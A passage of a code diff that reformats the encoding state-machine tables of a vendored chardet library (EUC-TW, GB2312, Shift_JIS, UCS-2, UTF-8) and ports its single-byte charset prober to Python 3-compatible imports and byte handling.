3,3,3,3,3,3,3,3, # e0 - e7 + 3,3,3,3,3,3,3,3, # e8 - ef + 3,3,3,3,3,3,3,3, # f0 - f7 + 3,3,3,3,3,3,3,0 # f8 - ff +) -EUCTW_st = ( \ - eError,eError,eStart, 3, 3, 3, 4,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17 - eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f - 5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27 - eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f +EUCTW_st = ( + eError,eError,eStart, 3, 3, 3, 4,eError,#00-07 + eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eStart,eError,#10-17 + eStart,eStart,eStart,eError,eError,eError,eError,eError,#18-1f + 5,eError,eError,eError,eStart,eError,eStart,eStart,#20-27 + eStart,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f +) EUCTWCharLenTable = (0, 0, 1, 2, 2, 2, 3) @@ -229,53 +277,55 @@ EUCTWSMModel = {'classTable': EUCTW_cls, # GB2312 -GB2312_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 3,3,3,3,3,3,3,3, # 30 - 37 - 3,3,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,4, # 78 - 7f - 5,6,6,6,6,6,6,6, # 80 - 87 - 6,6,6,6,6,6,6,6, # 88 - 8f - 6,6,6,6,6,6,6,6, # 90 - 97 - 6,6,6,6,6,6,6,6, # 98 - 9f - 6,6,6,6,6,6,6,6, # a0 - a7 - 6,6,6,6,6,6,6,6, # a8 - af - 6,6,6,6,6,6,6,6, # b0 - b7 - 6,6,6,6,6,6,6,6, # b8 - bf - 6,6,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 6,6,6,6,6,6,6,6, # e0 - e7 - 6,6,6,6,6,6,6,6, # e8 - ef - 6,6,6,6,6,6,6,6, # f0 - f7 - 6,6,6,6,6,6,6,0) # f8 - ff +GB2312_cls = ( + 1,1,1,1,1,1,1,1, # 00 - 07 + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 3,3,3,3,3,3,3,3, # 30 - 37 + 3,3,1,1,1,1,1,1, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,4, # 78 - 7f + 5,6,6,6,6,6,6,6, # 80 - 87 + 6,6,6,6,6,6,6,6, # 88 - 8f + 6,6,6,6,6,6,6,6, # 90 - 97 + 6,6,6,6,6,6,6,6, # 98 - 9f + 6,6,6,6,6,6,6,6, # a0 - a7 + 6,6,6,6,6,6,6,6, # a8 - af + 6,6,6,6,6,6,6,6, # b0 - b7 + 6,6,6,6,6,6,6,6, # b8 - bf + 6,6,6,6,6,6,6,6, # c0 - c7 + 6,6,6,6,6,6,6,6, # c8 - cf + 6,6,6,6,6,6,6,6, # d0 - d7 + 6,6,6,6,6,6,6,6, # d8 - df + 6,6,6,6,6,6,6,6, # e0 - e7 + 6,6,6,6,6,6,6,6, # e8 - ef + 6,6,6,6,6,6,6,6, # f0 - f7 + 6,6,6,6,6,6,6,0 # f8 - ff +) -GB2312_st = ( \ - eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07 - eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17 - 4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f - eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27 - eError,eError,eStart,eStart,eStart,eStart,eStart,eStart)#28-2f +GB2312_st = ( + eError,eStart,eStart,eStart,eStart,eStart, 3,eError,#00-07 + eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,eStart,#10-17 + 4,eError,eStart,eStart,eError,eError,eError,eError,#18-1f + eError,eError, 5,eError,eError,eError,eItsMe,eError,#20-27 + eError,eError,eStart,eStart,eStart,eStart,eStart,eStart #28-2f +) -# To be accurate, the length of class 6 can be either 2 or 4. -# But it is not necessary to discriminate between the two since -# it is used for frequency analysis only, and we are validing -# each code range there as well. So it is safe to set it to be -# 2 here. +# To be accurate, the length of class 6 can be either 2 or 4. +# But it is not necessary to discriminate between the two since +# it is used for frequency analysis only, and we are validing +# each code range there as well. So it is safe to set it to be +# 2 here. GB2312CharLenTable = (0, 1, 1, 1, 1, 1, 2) GB2312SMModel = {'classTable': GB2312_cls, @@ -286,46 +336,48 @@ GB2312SMModel = {'classTable': GB2312_cls, # Shift_JIS -SJIS_cls = ( \ - 1,1,1,1,1,1,1,1, # 00 - 07 - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 2,2,2,2,2,2,2,2, # 40 - 47 - 2,2,2,2,2,2,2,2, # 48 - 4f - 2,2,2,2,2,2,2,2, # 50 - 57 - 2,2,2,2,2,2,2,2, # 58 - 5f - 2,2,2,2,2,2,2,2, # 60 - 67 - 2,2,2,2,2,2,2,2, # 68 - 6f - 2,2,2,2,2,2,2,2, # 70 - 77 - 2,2,2,2,2,2,2,1, # 78 - 7f - 3,3,3,3,3,3,3,3, # 80 - 87 - 3,3,3,3,3,3,3,3, # 88 - 8f - 3,3,3,3,3,3,3,3, # 90 - 97 - 3,3,3,3,3,3,3,3, # 98 - 9f - #0xa0 is illegal in sjis encoding, but some pages does +SJIS_cls = ( + 1,1,1,1,1,1,1,1, # 00 - 07 + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 2,2,2,2,2,2,2,2, # 40 - 47 + 2,2,2,2,2,2,2,2, # 48 - 4f + 2,2,2,2,2,2,2,2, # 50 - 57 + 2,2,2,2,2,2,2,2, # 58 - 5f + 2,2,2,2,2,2,2,2, # 60 - 67 + 2,2,2,2,2,2,2,2, # 68 - 6f + 2,2,2,2,2,2,2,2, # 70 - 77 + 2,2,2,2,2,2,2,1, # 78 - 7f + 3,3,3,3,3,2,2,3, # 80 - 87 + 3,3,3,3,3,3,3,3, # 88 - 8f + 3,3,3,3,3,3,3,3, # 90 - 97 + 3,3,3,3,3,3,3,3, # 98 - 9f + #0xa0 is illegal in sjis encoding, but some pages does #contain such byte. We need to be more error forgiven. - 2,2,2,2,2,2,2,2, # a0 - a7 - 2,2,2,2,2,2,2,2, # a8 - af - 2,2,2,2,2,2,2,2, # b0 - b7 - 2,2,2,2,2,2,2,2, # b8 - bf - 2,2,2,2,2,2,2,2, # c0 - c7 - 2,2,2,2,2,2,2,2, # c8 - cf - 2,2,2,2,2,2,2,2, # d0 - d7 - 2,2,2,2,2,2,2,2, # d8 - df - 3,3,3,3,3,3,3,3, # e0 - e7 - 3,3,3,3,3,4,4,4, # e8 - ef - 4,4,4,4,4,4,4,4, # f0 - f7 - 4,4,4,4,4,0,0,0) # f8 - ff + 2,2,2,2,2,2,2,2, # a0 - a7 + 2,2,2,2,2,2,2,2, # a8 - af + 2,2,2,2,2,2,2,2, # b0 - b7 + 2,2,2,2,2,2,2,2, # b8 - bf + 2,2,2,2,2,2,2,2, # c0 - c7 + 2,2,2,2,2,2,2,2, # c8 - cf + 2,2,2,2,2,2,2,2, # d0 - d7 + 2,2,2,2,2,2,2,2, # d8 - df + 3,3,3,3,3,3,3,3, # e0 - e7 + 3,3,3,3,3,4,4,4, # e8 - ef + 3,3,3,3,3,3,3,3, # f0 - f7 + 3,3,3,3,3,0,0,0) # f8 - ff -SJIS_st = ( \ - eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart)#10-17 + +SJIS_st = ( + eError,eStart,eStart, 3,eError,eError,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe,eError,eError,eStart,eStart,eStart,eStart #10-17 +) SJISCharLenTable = (0, 1, 1, 2, 0, 0) @@ -337,48 +389,50 @@ SJISSMModel = {'classTable': SJIS_cls, # UCS2-BE -UCS2BE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff +UCS2BE_cls = ( + 0,0,0,0,0,0,0,0, # 00 - 07 + 0,0,1,0,0,2,0,0, # 08 - 0f + 0,0,0,0,0,0,0,0, # 10 - 17 + 0,0,0,3,0,0,0,0, # 18 - 1f + 0,0,0,0,0,0,0,0, # 20 - 27 + 0,3,3,3,3,3,0,0, # 28 - 2f + 0,0,0,0,0,0,0,0, # 30 - 37 + 0,0,0,0,0,0,0,0, # 38 - 3f + 0,0,0,0,0,0,0,0, # 40 - 47 + 0,0,0,0,0,0,0,0, # 48 - 4f + 0,0,0,0,0,0,0,0, # 50 - 57 + 0,0,0,0,0,0,0,0, # 58 - 5f + 0,0,0,0,0,0,0,0, # 60 - 67 + 0,0,0,0,0,0,0,0, # 68 - 6f + 0,0,0,0,0,0,0,0, # 70 - 77 + 0,0,0,0,0,0,0,0, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,0,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,0,0,0,0,0,0,0, # a0 - a7 + 0,0,0,0,0,0,0,0, # a8 - af + 0,0,0,0,0,0,0,0, # b0 - b7 + 0,0,0,0,0,0,0,0, # b8 - bf + 0,0,0,0,0,0,0,0, # c0 - c7 + 0,0,0,0,0,0,0,0, # c8 - cf + 0,0,0,0,0,0,0,0, # d0 - d7 + 0,0,0,0,0,0,0,0, # d8 - df + 0,0,0,0,0,0,0,0, # e0 - e7 + 0,0,0,0,0,0,0,0, # e8 - ef + 0,0,0,0,0,0,0,0, # f0 - f7 + 0,0,0,0,0,0,4,5 # f8 - ff +) -UCS2BE_st = ( \ - 5, 7, 7,eError, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 - 6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f - 6, 6, 6, 6, 5, 7, 7,eError,#20-27 - 5, 8, 6, 6,eError, 6, 6, 6,#28-2f - 6, 6, 6, 6,eError,eError,eStart,eStart)#30-37 +UCS2BE_st = ( + 5, 7, 7,eError, 4, 3,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe, 6, 6, 6, 6,eError,eError,#10-17 + 6, 6, 6, 6, 6,eItsMe, 6, 6,#18-1f + 6, 6, 6, 6, 5, 7, 7,eError,#20-27 + 5, 8, 6, 6,eError, 6, 6, 6,#28-2f + 6, 6, 6, 6,eError,eError,eStart,eStart #30-37 +) UCS2BECharLenTable = (2, 2, 2, 0, 2, 2) @@ -390,48 +444,50 @@ UCS2BESMModel = {'classTable': UCS2BE_cls, # UCS2-LE -UCS2LE_cls = ( \ - 0,0,0,0,0,0,0,0, # 00 - 07 - 0,0,1,0,0,2,0,0, # 08 - 0f - 0,0,0,0,0,0,0,0, # 10 - 17 - 0,0,0,3,0,0,0,0, # 18 - 1f - 0,0,0,0,0,0,0,0, # 20 - 27 - 0,3,3,3,3,3,0,0, # 28 - 2f - 0,0,0,0,0,0,0,0, # 30 - 37 - 0,0,0,0,0,0,0,0, # 38 - 3f - 0,0,0,0,0,0,0,0, # 40 - 47 - 0,0,0,0,0,0,0,0, # 48 - 4f - 0,0,0,0,0,0,0,0, # 50 - 57 - 0,0,0,0,0,0,0,0, # 58 - 5f - 0,0,0,0,0,0,0,0, # 60 - 67 - 0,0,0,0,0,0,0,0, # 68 - 6f - 0,0,0,0,0,0,0,0, # 70 - 77 - 0,0,0,0,0,0,0,0, # 78 - 7f - 0,0,0,0,0,0,0,0, # 80 - 87 - 0,0,0,0,0,0,0,0, # 88 - 8f - 0,0,0,0,0,0,0,0, # 90 - 97 - 0,0,0,0,0,0,0,0, # 98 - 9f - 0,0,0,0,0,0,0,0, # a0 - a7 - 0,0,0,0,0,0,0,0, # a8 - af - 0,0,0,0,0,0,0,0, # b0 - b7 - 0,0,0,0,0,0,0,0, # b8 - bf - 0,0,0,0,0,0,0,0, # c0 - c7 - 0,0,0,0,0,0,0,0, # c8 - cf - 0,0,0,0,0,0,0,0, # d0 - d7 - 0,0,0,0,0,0,0,0, # d8 - df - 0,0,0,0,0,0,0,0, # e0 - e7 - 0,0,0,0,0,0,0,0, # e8 - ef - 0,0,0,0,0,0,0,0, # f0 - f7 - 0,0,0,0,0,0,4,5) # f8 - ff +UCS2LE_cls = ( + 0,0,0,0,0,0,0,0, # 00 - 07 + 0,0,1,0,0,2,0,0, # 08 - 0f + 0,0,0,0,0,0,0,0, # 10 - 17 + 0,0,0,3,0,0,0,0, # 18 - 1f + 0,0,0,0,0,0,0,0, # 20 - 27 + 0,3,3,3,3,3,0,0, # 28 - 2f + 0,0,0,0,0,0,0,0, # 30 - 37 + 0,0,0,0,0,0,0,0, # 38 - 3f + 0,0,0,0,0,0,0,0, # 40 - 47 + 0,0,0,0,0,0,0,0, # 48 - 4f + 0,0,0,0,0,0,0,0, # 50 - 57 + 0,0,0,0,0,0,0,0, # 58 - 5f + 0,0,0,0,0,0,0,0, # 60 - 67 + 0,0,0,0,0,0,0,0, # 68 - 6f + 0,0,0,0,0,0,0,0, # 70 - 77 + 0,0,0,0,0,0,0,0, # 78 - 7f + 0,0,0,0,0,0,0,0, # 80 - 87 + 0,0,0,0,0,0,0,0, # 88 - 8f + 0,0,0,0,0,0,0,0, # 90 - 97 + 0,0,0,0,0,0,0,0, # 98 - 9f + 0,0,0,0,0,0,0,0, # a0 - a7 + 0,0,0,0,0,0,0,0, # a8 - af + 0,0,0,0,0,0,0,0, # b0 - b7 + 0,0,0,0,0,0,0,0, # b8 - bf + 0,0,0,0,0,0,0,0, # c0 - c7 + 0,0,0,0,0,0,0,0, # c8 - cf + 0,0,0,0,0,0,0,0, # d0 - d7 + 0,0,0,0,0,0,0,0, # d8 - df + 0,0,0,0,0,0,0,0, # e0 - e7 + 0,0,0,0,0,0,0,0, # e8 - ef + 0,0,0,0,0,0,0,0, # f0 - f7 + 0,0,0,0,0,0,4,5 # f8 - ff +) -UCS2LE_st = ( \ - 6, 6, 7, 6, 4, 3,eError,eError,#00-07 - eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f - eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17 - 5, 5, 5,eError, 5,eError, 6, 6,#18-1f - 7, 6, 8, 8, 5, 5, 5,eError,#20-27 - 5, 5, 5,eError,eError,eError, 5, 5,#28-2f - 5, 5, 5,eError, 5,eError,eStart,eStart)#30-37 +UCS2LE_st = ( + 6, 6, 7, 6, 4, 3,eError,eError,#00-07 + eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,#08-0f + eItsMe,eItsMe, 5, 5, 5,eError,eItsMe,eError,#10-17 + 5, 5, 5,eError, 5,eError, 6, 6,#18-1f + 7, 6, 8, 8, 5, 5, 5,eError,#20-27 + 5, 5, 5,eError,eError,eError, 5, 5,#28-2f + 5, 5, 5,eError, 5,eError,eStart,eStart #30-37 +) UCS2LECharLenTable = (2, 2, 2, 2, 2, 2) @@ -443,67 +499,69 @@ UCS2LESMModel = {'classTable': UCS2LE_cls, # UTF-8 -UTF8_cls = ( \ +UTF8_cls = ( 1,1,1,1,1,1,1,1, # 00 - 07 #allow 0x00 as a legal value - 1,1,1,1,1,1,0,0, # 08 - 0f - 1,1,1,1,1,1,1,1, # 10 - 17 - 1,1,1,0,1,1,1,1, # 18 - 1f - 1,1,1,1,1,1,1,1, # 20 - 27 - 1,1,1,1,1,1,1,1, # 28 - 2f - 1,1,1,1,1,1,1,1, # 30 - 37 - 1,1,1,1,1,1,1,1, # 38 - 3f - 1,1,1,1,1,1,1,1, # 40 - 47 - 1,1,1,1,1,1,1,1, # 48 - 4f - 1,1,1,1,1,1,1,1, # 50 - 57 - 1,1,1,1,1,1,1,1, # 58 - 5f - 1,1,1,1,1,1,1,1, # 60 - 67 - 1,1,1,1,1,1,1,1, # 68 - 6f - 1,1,1,1,1,1,1,1, # 70 - 77 - 1,1,1,1,1,1,1,1, # 78 - 7f - 2,2,2,2,3,3,3,3, # 80 - 87 - 4,4,4,4,4,4,4,4, # 88 - 8f - 4,4,4,4,4,4,4,4, # 90 - 97 - 4,4,4,4,4,4,4,4, # 98 - 9f - 5,5,5,5,5,5,5,5, # a0 - a7 - 5,5,5,5,5,5,5,5, # a8 - af - 5,5,5,5,5,5,5,5, # b0 - b7 - 5,5,5,5,5,5,5,5, # b8 - bf - 0,0,6,6,6,6,6,6, # c0 - c7 - 6,6,6,6,6,6,6,6, # c8 - cf - 6,6,6,6,6,6,6,6, # d0 - d7 - 6,6,6,6,6,6,6,6, # d8 - df - 7,8,8,8,8,8,8,8, # e0 - e7 - 8,8,8,8,8,9,8,8, # e8 - ef - 10,11,11,11,11,11,11,11, # f0 - f7 - 12,13,13,13,14,15,0,0) # f8 - ff + 1,1,1,1,1,1,0,0, # 08 - 0f + 1,1,1,1,1,1,1,1, # 10 - 17 + 1,1,1,0,1,1,1,1, # 18 - 1f + 1,1,1,1,1,1,1,1, # 20 - 27 + 1,1,1,1,1,1,1,1, # 28 - 2f + 1,1,1,1,1,1,1,1, # 30 - 37 + 1,1,1,1,1,1,1,1, # 38 - 3f + 1,1,1,1,1,1,1,1, # 40 - 47 + 1,1,1,1,1,1,1,1, # 48 - 4f + 1,1,1,1,1,1,1,1, # 50 - 57 + 1,1,1,1,1,1,1,1, # 58 - 5f + 1,1,1,1,1,1,1,1, # 60 - 67 + 1,1,1,1,1,1,1,1, # 68 - 6f + 1,1,1,1,1,1,1,1, # 70 - 77 + 1,1,1,1,1,1,1,1, # 78 - 7f + 2,2,2,2,3,3,3,3, # 80 - 87 + 4,4,4,4,4,4,4,4, # 88 - 8f + 4,4,4,4,4,4,4,4, # 90 - 97 + 4,4,4,4,4,4,4,4, # 98 - 9f + 5,5,5,5,5,5,5,5, # a0 - a7 + 5,5,5,5,5,5,5,5, # a8 - af + 5,5,5,5,5,5,5,5, # b0 - b7 + 5,5,5,5,5,5,5,5, # b8 - bf + 0,0,6,6,6,6,6,6, # c0 - c7 + 6,6,6,6,6,6,6,6, # c8 - cf + 6,6,6,6,6,6,6,6, # d0 - d7 + 6,6,6,6,6,6,6,6, # d8 - df + 7,8,8,8,8,8,8,8, # e0 - e7 + 8,8,8,8,8,9,8,8, # e8 - ef + 10,11,11,11,11,11,11,11, # f0 - f7 + 12,13,13,13,14,15,0,0 # f8 - ff +) -UTF8_st = ( \ - eError,eStart,eError,eError,eError,eError, 12, 10,#00-07 - 9, 11, 8, 7, 6, 5, 4, 3,#08-0f - eError,eError,eError,eError,eError,eError,eError,eError,#10-17 - eError,eError,eError,eError,eError,eError,eError,eError,#18-1f - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27 - eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f - eError,eError, 5, 5, 5, 5,eError,eError,#30-37 - eError,eError,eError,eError,eError,eError,eError,eError,#38-3f - eError,eError,eError, 5, 5, 5,eError,eError,#40-47 - eError,eError,eError,eError,eError,eError,eError,eError,#48-4f - eError,eError, 7, 7, 7, 7,eError,eError,#50-57 - eError,eError,eError,eError,eError,eError,eError,eError,#58-5f - eError,eError,eError,eError, 7, 7,eError,eError,#60-67 - eError,eError,eError,eError,eError,eError,eError,eError,#68-6f - eError,eError, 9, 9, 9, 9,eError,eError,#70-77 - eError,eError,eError,eError,eError,eError,eError,eError,#78-7f - eError,eError,eError,eError,eError, 9,eError,eError,#80-87 - eError,eError,eError,eError,eError,eError,eError,eError,#88-8f - eError,eError, 12, 12, 12, 12,eError,eError,#90-97 - eError,eError,eError,eError,eError,eError,eError,eError,#98-9f - eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7 - eError,eError,eError,eError,eError,eError,eError,eError,#a8-af - eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7 - eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf - eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7 - eError,eError,eError,eError,eError,eError,eError,eError)#c8-cf +UTF8_st = ( + eError,eStart,eError,eError,eError,eError, 12, 10,#00-07 + 9, 11, 8, 7, 6, 5, 4, 3,#08-0f + eError,eError,eError,eError,eError,eError,eError,eError,#10-17 + eError,eError,eError,eError,eError,eError,eError,eError,#18-1f + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#20-27 + eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,#28-2f + eError,eError, 5, 5, 5, 5,eError,eError,#30-37 + eError,eError,eError,eError,eError,eError,eError,eError,#38-3f + eError,eError,eError, 5, 5, 5,eError,eError,#40-47 + eError,eError,eError,eError,eError,eError,eError,eError,#48-4f + eError,eError, 7, 7, 7, 7,eError,eError,#50-57 + eError,eError,eError,eError,eError,eError,eError,eError,#58-5f + eError,eError,eError,eError, 7, 7,eError,eError,#60-67 + eError,eError,eError,eError,eError,eError,eError,eError,#68-6f + eError,eError, 9, 9, 9, 9,eError,eError,#70-77 + eError,eError,eError,eError,eError,eError,eError,eError,#78-7f + eError,eError,eError,eError,eError, 9,eError,eError,#80-87 + eError,eError,eError,eError,eError,eError,eError,eError,#88-8f + eError,eError, 12, 12, 12, 12,eError,eError,#90-97 + eError,eError,eError,eError,eError,eError,eError,eError,#98-9f + eError,eError,eError,eError,eError, 12,eError,eError,#a0-a7 + eError,eError,eError,eError,eError,eError,eError,eError,#a8-af + eError,eError, 12, 12, 12,eError,eError,eError,#b0-b7 + eError,eError,eError,eError,eError,eError,eError,eError,#b8-bf + eError,eError,eStart,eStart,eStart,eStart,eError,eError,#c0-c7 + eError,eError,eError,eError,eError,eError,eError,eError #c8-cf +) UTF8CharLenTable = (0, 1, 0, 0, 0, 0, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6) diff --git a/thirdparty/chardet/sbcharsetprober.py b/thirdparty/chardet/sbcharsetprober.py index f92fc14c8..37291bd27 100644 --- a/thirdparty/chardet/sbcharsetprober.py +++ b/thirdparty/chardet/sbcharsetprober.py @@ -14,20 +14,22 @@ # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. -# +# # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. -# +# # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA # 02110-1301 USA ######################### END LICENSE BLOCK ######################### -import constants, sys -from charsetprober import CharSetProber +import sys +from . import constants +from .charsetprober import CharSetProber +from .compat import wrap_ord SAMPLE_SIZE = 64 SB_ENOUGH_REL_THRESHOLD = 1024 @@ -38,21 +40,26 @@ NUMBER_OF_SEQ_CAT = 4 POSITIVE_CAT = NUMBER_OF_SEQ_CAT - 1 #NEGATIVE_CAT = 0 + class SingleByteCharSetProber(CharSetProber): - def __init__(self, model, reversed=constants.False, nameProber=None): + def __init__(self, model, reversed=False, nameProber=None): CharSetProber.__init__(self) self._mModel = model - self._mReversed = reversed # TRUE if we need to reverse every pair in the model lookup - self._mNameProber = nameProber # Optional auxiliary prober for name decision + # TRUE if we need to reverse every pair in the model lookup + self._mReversed = reversed + # Optional auxiliary prober for name decision + self._mNameProber = nameProber self.reset() def reset(self): CharSetProber.reset(self) - self._mLastOrder = 255 # char order of last character + # char order of last character + self._mLastOrder = 255 self._mSeqCounters = [0] * NUMBER_OF_SEQ_CAT self._mTotalSeqs = 0 self._mTotalChar = 0 - self._mFreqChar = 0 # characters that fall in our sampling range + # characters that fall in our sampling range + self._mFreqChar = 0 def get_charset_name(self): if self._mNameProber: @@ -67,7 +74,7 @@ class SingleByteCharSetProber(CharSetProber): if not aLen: return self.get_state() for c in aBuf: - order = self._mModel['charToOrderMap'][ord(c)] + order = self._mModel['charToOrderMap'][wrap_ord(c)] if order < SYMBOL_CAT_ORDER: self._mTotalChar += 1 if order < SAMPLE_SIZE: @@ -75,9 +82,12 @@ class SingleByteCharSetProber(CharSetProber): if self._mLastOrder < SAMPLE_SIZE: self._mTotalSeqs += 1 if not self._mReversed: - self._mSeqCounters[self._mModel['precedenceMatrix'][(self._mLastOrder * SAMPLE_SIZE) + order]] += 1 - else: # reverse the order of the letters in the lookup - self._mSeqCounters[self._mModel['precedenceMatrix'][(order * SAMPLE_SIZE) + self._mLastOrder]] += 1 + i = (self._mLastOrder * SAMPLE_SIZE) + order + model = self._mModel['precedenceMatrix'][i] + else: # reverse the order of the letters in the lookup + i = (order * SAMPLE_SIZE) + self._mLastOrder + model = self._mModel['precedenceMatrix'][i] + self._mSeqCounters[model] += 1 self._mLastOrder = order if self.get_state() == constants.eDetecting: @@ -85,11 +95,16 @@ class SingleByteCharSetProber(CharSetProber): cf = self.get_confidence() if cf > POSITIVE_SHORTCUT_THRESHOLD: if constants._debug: - sys.stderr.write('%s confidence = %s, we have a winner\n' % (self._mModel['charsetName'], cf)) + sys.stderr.write('%s confidence = %s, we have a' + 'winner\n' % + (self._mModel['charsetName'], cf)) self._mState = constants.eFoundIt elif cf < NEGATIVE_SHORTCUT_THRESHOLD: if constants._debug: - sys.stderr.write('%s confidence = %s, below negative shortcut threshhold %s\n' % (self._mModel['charsetName'], cf, NEGATIVE_SHORTCUT_THRESHOLD)) + sys.stderr.write('%s confidence = %s, below negative' + 'shortcut threshhold %s\n' % + (self._mModel['charsetName'], cf, + NEGATIVE_SHORTCUT_THRESHOLD)) self._mState = constants.eNotMe return self.get_state() @@ -97,9 +112,8 @@ class SingleByteCharSetProber(CharSetProber): def get_confidence(self): r = 0.01 